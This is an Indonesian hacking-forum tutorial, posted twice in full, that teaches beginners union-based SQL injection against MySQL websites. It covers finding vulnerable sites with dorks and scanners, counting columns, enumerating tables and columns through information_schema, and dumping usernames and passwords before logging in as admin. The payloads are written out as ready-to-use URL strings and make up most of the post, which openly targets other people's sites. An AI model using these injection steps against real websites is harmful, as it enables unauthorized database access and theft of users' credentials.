Pencarian
Community Patner
Hosting Free
User Yang Sedang Online
Total 1 user online :: 0 Terdaftar, 0 Tersembunyi dan 1 Tamu Tidak ada
User online terbanyak adalah 18 pada Thu Apr 06, 2023 10:11 pm
Statistics
Total 215 user terdaftarUser terdaftar terakhir adalah skreyv
Total 75 kiriman artikel dari user in 35 subjects
[TUTORIAL] SQL Injection For Newbie
Halaman 1 dari 1
[TUTORIAL] SQL Injection For Newbie
by Administrator Sat Mar 26, 2011 11:53 am
kita harus berbagi tutorial
agar hacker indonesia bsa menang ini
tutro yang gw tau dari wild strato
Tutorial Text ?? click next
1. silahkan anda cari sendiri website yang bisa dibug melalui google/bing ataupun SQLi Scanner..
kalau aku sih pake SQLi Scanner di
http://revtan.site40.net/scanner/? ama http://strato.co.cc/...%20sqliscanner/
. pilih aja dork listnya:
untuk list dork di wild-hack.blogspot.com
3. untuk yang pakai manual cek di google/bing:
contoh: http://site.com/index.php?id=1' <- You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
Nb: berarti Webnya bisa di hack. Dan untuk yang pakai scanner. udah disediain web yang bisa dihack
4. lalu coba anda tambahkan kata: order by 1-- sampai menuju titik error
example:
http://site.com/index.php?id=1 order by 1-- <-- no error
http://site.com/index.php?id=1 order by 2-- <-- no error
http://site.com/index.php?id=1 order by 3-- <-- no error
http://site.com/index.php?id=1 order by 4-- <-- ERROR..!
5. nah yang kita ambil adalah bagian 3-nya (yang error ndak usah)
sekarang coba hapuskan order by 4-- , lalu diganti dengan :
http://site.com/index.php?id=-1 union all select 1,2,3--
(pada bagian warna merah (samping id) dikasih - dan pada setelah angka id, dikasih union all select 1,2,3-- <<-- dimana pada order by tidak terjadi error)
6. nah pasti keluar angka dibagian wesitenya, contoh saya ambil angka 2. lalu coba angka 2 diganti menjadi @@version:
ex:
http://site.com/index.php?id= union all select 1,@@version,3--
7. jika keluar angka versi 5.0.1 comunity log (atau yang lain << yang penting versi 5) berarti lanjutkan
kalau keluar versi 4 tinggalkan saja dan cari web lain..!!
8. nah coba @@version diganti jadi group_concat(table_name) dan disamping union all select 1,2,3 ditambahkan from information_schema.tables where table_schema=database()
Contoh: http://site.com/index.php?id= union all select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--
9. nah disitu keluar beberapa table yang mungkin ada table berisi users ataupun admin. contoh keluar table bernama users, lalu hex kata "users"
1. buka link: http://www.swingnote...s/texttohex.php
2. dibagian string masukan text yang ingin di hex
3. click convert
4. copy hex: jika sudah maka bagian group_concat(table_name) dan from information_schema.tables where table_schema=database()
diubah menjadi:
- table_name = column_name = group_concat(column_name)
- tables = columns = from information_schema.columns
- table_schema=database() = table_name=0x(tambahkan / paste kata yang di hex tadi) = table_name=0x7573657273
Contoh: http://site.com/index.php?id=-1 union all select 1,group_concat(column_name),3 from information_schema.columns where table_name=0x7573657273--
10. nah setelah itu akan ad beberapa colum tentang username, password, email, etc.
lalu dibagian group_concat(column_name) . dibagian merah ubah dengan diisikan column username dan password.
contoh:
group_concat(username,0x3a,password) <- setiap ingin menambahkan column, tambahkan koma (,) dan 0x3a lalu ubah: information_schema.columns where table_name=0x7573657273-- dengan nama table yang barusan di hex (contoh yang ini users) maka from users--
example :
http://site.com/index.php?id=-1 union all select 1,group_concat(username,0x3a,password)3 from users--
11. lalu akan keluar username dan password yang kemungkinan ad username admin dengan password admin
12. silahkan cari sendiri halaman login admin..
13 Enjoy~~
kalo ada yang punya berbagi karna
dari berbagi dapat sukses
agar hacker indonesia bsa menang ini
tutro yang gw tau dari wild strato
Tutorial Text ?? click next
1. silahkan anda cari sendiri website yang bisa dibug melalui google/bing ataupun SQLi Scanner..
kalau aku sih pake SQLi Scanner di
http://revtan.site40.net/scanner/? ama http://strato.co.cc/...%20sqliscanner/
. pilih aja dork listnya:
untuk list dork di wild-hack.blogspot.com
3. untuk yang pakai manual cek di google/bing:
contoh: http://site.com/index.php?id=1' <- You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
Nb: berarti Webnya bisa di hack. Dan untuk yang pakai scanner. udah disediain web yang bisa dihack
4. lalu coba anda tambahkan kata: order by 1-- sampai menuju titik error
example:
http://site.com/index.php?id=1 order by 1-- <-- no error
http://site.com/index.php?id=1 order by 2-- <-- no error
http://site.com/index.php?id=1 order by 3-- <-- no error
http://site.com/index.php?id=1 order by 4-- <-- ERROR..!
5. nah yang kita ambil adalah bagian 3-nya (yang error ndak usah)
sekarang coba hapuskan order by 4-- , lalu diganti dengan :
http://site.com/index.php?id=-1 union all select 1,2,3--
(pada bagian warna merah (samping id) dikasih - dan pada setelah angka id, dikasih union all select 1,2,3-- <<-- dimana pada order by tidak terjadi error)
6. nah pasti keluar angka dibagian wesitenya, contoh saya ambil angka 2. lalu coba angka 2 diganti menjadi @@version:
ex:
http://site.com/index.php?id= union all select 1,@@version,3--
7. jika keluar angka versi 5.0.1 comunity log (atau yang lain << yang penting versi 5) berarti lanjutkan
kalau keluar versi 4 tinggalkan saja dan cari web lain..!!
8. nah coba @@version diganti jadi group_concat(table_name) dan disamping union all select 1,2,3 ditambahkan from information_schema.tables where table_schema=database()
Contoh: http://site.com/index.php?id= union all select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--
9. nah disitu keluar beberapa table yang mungkin ada table berisi users ataupun admin. contoh keluar table bernama users, lalu hex kata "users"
1. buka link: http://www.swingnote...s/texttohex.php
2. dibagian string masukan text yang ingin di hex
3. click convert
4. copy hex: jika sudah maka bagian group_concat(table_name) dan from information_schema.tables where table_schema=database()
diubah menjadi:
- table_name = column_name = group_concat(column_name)
- tables = columns = from information_schema.columns
- table_schema=database() = table_name=0x(tambahkan / paste kata yang di hex tadi) = table_name=0x7573657273
Contoh: http://site.com/index.php?id=-1 union all select 1,group_concat(column_name),3 from information_schema.columns where table_name=0x7573657273--
10. nah setelah itu akan ad beberapa colum tentang username, password, email, etc.
lalu dibagian group_concat(column_name) . dibagian merah ubah dengan diisikan column username dan password.
contoh:
group_concat(username,0x3a,password) <- setiap ingin menambahkan column, tambahkan koma (,) dan 0x3a lalu ubah: information_schema.columns where table_name=0x7573657273-- dengan nama table yang barusan di hex (contoh yang ini users) maka from users--
example :
http://site.com/index.php?id=-1 union all select 1,group_concat(username,0x3a,password)3 from users--
11. lalu akan keluar username dan password yang kemungkinan ad username admin dengan password admin
12. silahkan cari sendiri halaman login admin..
13 Enjoy~~
kalo ada yang punya berbagi karna
dari berbagi dapat sukses
Administrator- Administrators
- Jumlah posting : 23
Reputation : 1
Join date : 16.03.11
Age : 36
Lokasi : ACP -
Halaman 1 dari 1
Permissions in this forum:
Anda tidak dapat menjawab topik|
|
|